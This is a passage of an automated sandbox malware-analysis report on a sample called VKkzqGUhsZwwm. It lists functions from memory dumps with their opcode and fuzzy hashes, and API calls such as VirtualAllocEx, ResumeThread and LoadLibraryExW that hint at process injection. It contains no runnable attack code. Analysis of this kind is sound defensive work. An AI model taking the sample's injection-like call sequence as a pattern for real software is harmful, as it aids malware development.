                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: aa46d7e3fe2d0f8c43d8d978992dbc89117b11a08874a3a5b1fa727ccd814d4a
                                  • Instruction ID: b6db44eed4f4ec31e8a7fb005014cecc1b5f4f44ae013701620ca034dddac979
                                  • Opcode Fuzzy Hash: aa46d7e3fe2d0f8c43d8d978992dbc89117b11a08874a3a5b1fa727ccd814d4a
                                  • Instruction Fuzzy Hash: D21126B69003099FDB14CF9AC444ADEFBF4FB48314F10846AE519A7210C379A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251B2E0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0251B141,00000800,00000000,00000000), ref: 0251B352
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 97a83349568c63bf8b9090b27dc7b236b07f0ff38e75b0ec18ef361172fd0f17
                                  • Instruction ID: ed00ae1dd4b38a696dff24801788a75fc002dae5318175785494afdbbeaf8d82
                                  • Opcode Fuzzy Hash: 97a83349568c63bf8b9090b27dc7b236b07f0ff38e75b0ec18ef361172fd0f17
                                  • Instruction Fuzzy Hash: 861112B69003498FDB14DFAAC484ADEFBF5BB48318F14846AE819A7210C379A545CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84988 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B849F6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 0c7f6d6b36ee45d838239a960c09bdd7d63479395186437a1aa644b4fb3da2c0
                                  • Instruction ID: be2eaace2278fc4ab8377a05157d2eaa32624a2fb2c8fabbaf2c2e83fbfe3dec
                                  • Opcode Fuzzy Hash: 0c7f6d6b36ee45d838239a960c09bdd7d63479395186437a1aa644b4fb3da2c0
                                  • Instruction Fuzzy Hash: 4D1149B18002499FCB10DFAAC844BEFBFF5EF48320F108419E519A7250C779A940CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B847FF Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 2f061ca724fa94c8e696ea097deafd931d15fb90331bea34333c71dbb643b18b
                                  • Instruction ID: 0af3d598ec738b1996ab63d64e3a9fc99dc98db596c1ffa9e682517948f3a46d
                                  • Opcode Fuzzy Hash: 2f061ca724fa94c8e696ea097deafd931d15fb90331bea34333c71dbb643b18b
                                  • Instruction Fuzzy Hash: EA1128B1D002498FDB20DFAAC8457AFFBF5EF88724F108459D519A7250CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B87C10 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B87C75
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: cbcc32b1bc0ab2abeac272cccc682dd54dc87bf4930a976e387e6be78f5285c0
                                  • Instruction ID: a169168a2b41408df4df6be572fb1e07936bfd031f4a649d2e41feb5ca513254
                                  • Opcode Fuzzy Hash: cbcc32b1bc0ab2abeac272cccc682dd54dc87bf4930a976e387e6be78f5285c0
                                  • Instruction Fuzzy Hash: CE1113B58003489FCB10DF9AC845BDEBBF8FF48324F208459E558A3210C375A584CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B84800 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 658128819136768f5f78eaa0cacb48c70d49ec6a3beb8a4e6c5966c5b788b9e1
                                  • Instruction ID: f641a59e19e4feb92eb77352ac526d5c3097fdd664d43945b4924fdf20ab5cd9
                                  • Opcode Fuzzy Hash: 658128819136768f5f78eaa0cacb48c70d49ec6a3beb8a4e6c5966c5b788b9e1
                                  • Instruction Fuzzy Hash: 901136B1D003498FDB20DFAAC8457AFFBF5EF88724F208459D519A7250CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0251B060 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0251B0C6
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2042281318.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_2510000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 03dbffec7646dd0aa5a185f997a002cbc0e4a061151e62b02133f9958d7cbd83
                                  • Instruction ID: 13278053b04f28130b9f3ecb8d223cd628fcaebdb2934268589104c862dbc22d
                                  • Opcode Fuzzy Hash: 03dbffec7646dd0aa5a185f997a002cbc0e4a061151e62b02133f9958d7cbd83
                                  • Instruction Fuzzy Hash: 6111DFB5C003498FDB20DF9AD444AEEFBF4FF89228F10845AD429A7610C379A545CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06B85F7C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B87C75
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2046923728.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6b80000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: f4ed5aa4caa987bf584cd8967965dbbbbeb06daf800843bf3b0bb26756d42bd3
                                  • Instruction ID: cb58c13d737b0b707227e133280b25161ac65d08c4e3ac7efa4bc85f383ab0c5
                                  • Opcode Fuzzy Hash: f4ed5aa4caa987bf584cd8967965dbbbbeb06daf800843bf3b0bb26756d42bd3
                                  • Instruction Fuzzy Hash: 661106B5800348DFDB10DF9AC984BDEBFF8EB48314F208469E518A7211C375A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00AFD4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4a3f2f66d925d766c4ec6ab41b19c481dd5e6a5dbc156ee60717f594c17bea4
                                  • Instruction ID: b93ff6f85d17820871a55abd516d1d74c2ee53e2620976cd237a9399073c5dd7
                                  • Opcode Fuzzy Hash: b4a3f2f66d925d766c4ec6ab41b19c481dd5e6a5dbc156ee60717f594c17bea4
                                  • Instruction Fuzzy Hash: 6F212571500248DFCB16DF94D9C0F36BF66FB98318F20C569EA090B256C33AD816DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00AFD3D8 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 484482a787d46f1d9cada3d909112e22a84e3bf39d0ba46897e10f7c444d3344
                                  • Instruction ID: 07430492ab13002f14761e7412ce18f1ff14117433986129bdb1795464ad2185
                                  • Opcode Fuzzy Hash: 484482a787d46f1d9cada3d909112e22a84e3bf39d0ba46897e10f7c444d3344
                                  • Instruction Fuzzy Hash: F7212871500208DFDB06DF54D9C0F26BF66FB98315F20C569EA090B256C33AE856D7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B0D1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a585199f1eb0f0521e983aabc6429edef56399b1bb0a5c9193fc5803958ab365
                                  • Instruction ID: 309e16eec22965918ca53503f6cba4e50dc238b0bed117d51dfa923b30036867
                                  • Opcode Fuzzy Hash: a585199f1eb0f0521e983aabc6429edef56399b1bb0a5c9193fc5803958ab365
                                  • Instruction Fuzzy Hash: 5D21C271604204EFDB05DFA4D9C0B26BFA5FB88314F24C5ADE9494B2D6C33AD856CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B0D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8686021a57d32f4a25ac9c7353730787b70640f1a57970397d789f6888ffc2c5
                                  • Instruction ID: 482b8193c0b8e1f2858db921619f446221ef8d6f74f24a559ba0e76b60d0b2f0
                                  • Opcode Fuzzy Hash: 8686021a57d32f4a25ac9c7353730787b70640f1a57970397d789f6888ffc2c5
                                  • Instruction Fuzzy Hash: 7F21D071604204DFDB14DF64D9D4B26BFA5FB88314F20C5A9D94E4B2D6D33AD806CA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B0D006 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bb8aeb605a391f26e439954aec2c3b1cba5b28b04ec25ab15d200bf674e6595
                                  • Instruction ID: 52d3f4bb649e1a86de0075c2815c593dc2322a6caf850028a8294fa617e695b3
                                  • Opcode Fuzzy Hash: 4bb8aeb605a391f26e439954aec2c3b1cba5b28b04ec25ab15d200bf674e6595
                                  • Instruction Fuzzy Hash: 0F2192755083809FCB02CF54D994B11BFB1FB46314F28C5DAD8498F2A7D33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00AFD4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: cee1cbcc48676d0302824d15f91addf646a5361bbe6b6db6d116264bf7f2d698
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: BD112672404284CFCF02CF50D5C4B26BF72FB98314F24C6A9E9490B256C336D85ADBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00AFD3D3 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 8f76cfaec6b85c7fda3b79b5513c4549dcb333564aec678755d07a6610038d0f
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: FB112672404244CFCB02CF40D5C4B26BF72FB94324F24C6A9E9090B656C33AE85ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B0D1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041784763.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b0d000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 5106b3fc520553736751aa052618735168d6387efff3526e5fa0125fd7b23c5c
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 4C11BB75504280DFCB02CF54C5C4B15BFA1FB84314F24C6A9D8494B696C33AD80ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00AFD745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0367d5ce42cda3a7854b514faf70484649f2aea51842c68dae6a6feaf2d0c566
                                  • Instruction ID: 4cd22713fef6f35f5150b6aab8c19dfdc28d1f1df24d8268e82433a9caa989d5
                                  • Opcode Fuzzy Hash: 0367d5ce42cda3a7854b514faf70484649f2aea51842c68dae6a6feaf2d0c566
                                  • Instruction Fuzzy Hash: 5C01F7310043489AE722AB95CD84B76BFACEF45364F18C52AFE080E296C2399841CA71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00AFD744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2041630848.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_afd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dccd24f70ba554215c04790f25748581cecf1ddbb87541321fe07eec98e1bb9d
                                  • Instruction ID: fa45614fe59902cf044ce08d1472b5566163fc37557619e1941c702182eef89d
                                  • Opcode Fuzzy Hash: dccd24f70ba554215c04790f25748581cecf1ddbb87541321fe07eec98e1bb9d
                                  • Instruction Fuzzy Hash: E3F06271404344AAE7119F56C888B62FF98EF55734F18C45AFE484F296C2799C44CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.9%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:9
                                  Total number of Limit Nodes:2
                                  execution_graph 28108 5f4e198 28109 5f4e1a5 28108->28109 28110 5f4e1cd 28108->28110 28116 5f4d354 28110->28116 28112 5f4e1ee 28114 5f4e2b6 GlobalMemoryStatusEx 28115 5f4e2e6 28114->28115 28117 5f4e270 GlobalMemoryStatusEx 28116->28117 28119 5f4e1ea 28117->28119 28119->28112 28119->28114

                                  Executed Functions

                                  Function 02AA9B30 Relevance: 2.8, Instructions: 2830COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ca72bada86895ffd550e2f3696fb4dc48395462dc969f82ce7198baa4dc7935
                                  • Instruction ID: 43ed4d703c5842c5dc54b65e1f5b6669a711f333d454fbfef9908304ba94a66d
                                  • Opcode Fuzzy Hash: 9ca72bada86895ffd550e2f3696fb4dc48395462dc969f82ce7198baa4dc7935
                                  • Instruction Fuzzy Hash: 4863F531D10B1A8ADB11EF68C8946A9F7B1FF99300F51D79AE05867121FB70AAD4CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AACE88 Relevance: 2.3, Instructions: 2318COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d7a871039d56580d8d72053d384cb72db94fe8c03b339bd0a5dd7556dfa3be9
                                  • Instruction ID: f86c9bf969b207e0c2ca300172cddd3b0502fecf8067dc9f6972b3a3d425301b
                                  • Opcode Fuzzy Hash: 5d7a871039d56580d8d72053d384cb72db94fe8c03b339bd0a5dd7556dfa3be9
                                  • Instruction Fuzzy Hash: 32332E31D10B198EDB15DF68C8906ADF7B1FF89300F15C79AE458A7225EB70AAC5CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA9378 Relevance: .6, Instructions: 614COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e78410651314b426a0687d818c547a2e3f360fe46e911fa8120a92a606108aa
                                  • Instruction ID: ee6f28d09787b04db782ab4829ce76933f519d7b411e251ec18dcccbc4ca19ae
                                  • Opcode Fuzzy Hash: 2e78410651314b426a0687d818c547a2e3f360fe46e911fa8120a92a606108aa
                                  • Instruction Fuzzy Hash: 44328E74A002068FDB14DF68D594BAEBBB6FF88311F248469E80ADB395DB35DC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA4A98 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f838c4161db94a991b8c38a19e2920bf92551129164887e727dc09514ad22a2
                                  • Instruction ID: be1a0ce18bb2124f365a86845910292f069e452482345b279e7743985d8cc042
                                  • Opcode Fuzzy Hash: 1f838c4161db94a991b8c38a19e2920bf92551129164887e727dc09514ad22a2
                                  • Instruction Fuzzy Hash: E2B15F70E003098FDB10CFA9C9917ADBBF2AF88314F148529E819E7254EFB59845CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA3E80 Relevance: .2, Instructions: 238COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 22ad4ee4aeef4a3d0f4916609c082522e62852d792792078986426b0d28db3e8
                                  • Instruction ID: 8162bea1b3a5cec6b1413a71c437e7d9b78d3505a7acbb5e12a752d9580817de
                                  • Opcode Fuzzy Hash: 22ad4ee4aeef4a3d0f4916609c082522e62852d792792078986426b0d28db3e8
                                  • Instruction Fuzzy Hash: 0D913B70E10209DFDF14CFA9C9A57DEBBF2AF88314F14812AE415AB254EB749845CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA6ED8 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2406 2aa6ed8-2aa6f42 call 2aa6c40 2415 2aa6f5e-2aa6f8c 2406->2415 2416 2aa6f44-2aa6f5d call 2aa6384 2406->2416 2422 2aa6f8e-2aa6f91 2415->2422 2423 2aa6fcd-2aa6fd0 2422->2423 2424 2aa6f93-2aa6fc8 2422->2424 2425 2aa6fd2-2aa6fd9 2423->2425 2426 2aa6fe4-2aa6fe7 2423->2426 2424->2423 2427 2aa70eb-2aa70f1 2425->2427 2428 2aa6fdf 2425->2428 2429 2aa701a-2aa701d 2426->2429 2430 2aa6fe9-2aa6ffd 2426->2430 2428->2426 2431 2aa701f 2429->2431 2432 2aa702d-2aa702f 2429->2432 2438 2aa6fff-2aa7001 2430->2438 2439 2aa7003 2430->2439 2450 2aa701f call 2aa7918 2431->2450 2451 2aa701f call 2aa78ee 2431->2451 2433 2aa7031 2432->2433 2434 2aa7036-2aa7039 2432->2434 2433->2434 2434->2422 2437 2aa703f-2aa704e 2434->2437 2436 2aa7025-2aa7028 2436->2432 2443 2aa7078-2aa708e 2437->2443 2444 2aa7050-2aa7053 2437->2444 2440 2aa7006-2aa7015 2438->2440 2439->2440 2440->2429 2443->2427 2446 2aa705b-2aa7076 2444->2446 2446->2443 2446->2444 2450->2436 2451->2436
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq$LRjq
                                  • API String ID: 0-348097489
                                  • Opcode ID: 7418e6dbd45030858da88b23b5eade4078c6761daa56af010c13ddbd88376520
                                  • Instruction ID: e7d5290e9b9e6187f616dde212b997bb4b23cfaf90b59f959d86f3cd2fd58ef3
                                  • Opcode Fuzzy Hash: 7418e6dbd45030858da88b23b5eade4078c6761daa56af010c13ddbd88376520
                                  • Instruction Fuzzy Hash: DE41C030A002058FDB15DF78D9657AEB7B6EF89310F20896AE416EB290EF759842CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05F4E198 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3077 5f4e198-5f4e1a3 3078 5f4e1a5-5f4e1cc call 5f4d348 3077->3078 3079 5f4e1cd-5f4e1ec call 5f4d354 3077->3079 3085 5f4e1f2-5f4e251 3079->3085 3086 5f4e1ee-5f4e1f1 3079->3086 3093 5f4e257-5f4e2e4 GlobalMemoryStatusEx 3085->3093 3094 5f4e253-5f4e256 3085->3094 3098 5f4e2e6-5f4e2ec 3093->3098 3099 5f4e2ed-5f4e315 3093->3099 3098->3099
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3242316028.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_5f40000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99d35326740e8fbda38a874a93e17168bd0e9f17a169610339b6539f0622d16c
                                  • Instruction ID: c3fe9fe51c4983df14ae6d15b3f74e1c24cff71fcb4483c328fd7881a8b685c8
                                  • Opcode Fuzzy Hash: 99d35326740e8fbda38a874a93e17168bd0e9f17a169610339b6539f0622d16c
                                  • Instruction Fuzzy Hash: 96410272E043598FCB04CFA9C8546EABFF5BF89220F14856AD508E7241DB789985CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05F4D354 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 3102 5f4d354-5f4e2e4 GlobalMemoryStatusEx 3105 5f4e2e6-5f4e2ec 3102->3105 3106 5f4e2ed-5f4e315 3102->3106 3105->3106
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F4E1EA), ref: 05F4E2D7
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3242316028.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_5f40000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: d9be339a3e0be01ad35f897ad6c927277e589b1431e82db668aec0035b4744ee
                                  • Instruction ID: 4ce19fb62e97ad28e76d8997642b977a68683f1c20e976efebdd06ac8d504204
                                  • Opcode Fuzzy Hash: d9be339a3e0be01ad35f897ad6c927277e589b1431e82db668aec0035b4744ee
                                  • Instruction Fuzzy Hash: F41103B1C006599BCB10DF9AC544BAEFBF8FF48320F10816AE918A7241D778A944CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AAF3C5 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: fd26cda0c5eed76e0fd8a832a5bddea3c1d23080af845d8d61899dc23ed5e25a
                                  • Instruction ID: ac85239872299e6a888bfb36ad4edca7d97abafc6e00f868fff9c5e85a8986c7
                                  • Opcode Fuzzy Hash: fd26cda0c5eed76e0fd8a832a5bddea3c1d23080af845d8d61899dc23ed5e25a
